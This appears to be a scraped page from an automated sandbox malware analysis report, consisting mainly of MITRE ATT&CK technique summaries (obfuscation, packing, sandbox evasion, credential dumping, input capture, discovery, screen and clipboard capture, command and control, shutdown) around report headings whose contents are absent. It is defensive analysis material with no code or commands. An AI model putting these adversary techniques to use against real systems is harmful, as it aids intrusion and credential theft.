Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.W32.AIDetect.malware1.24453.7436

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre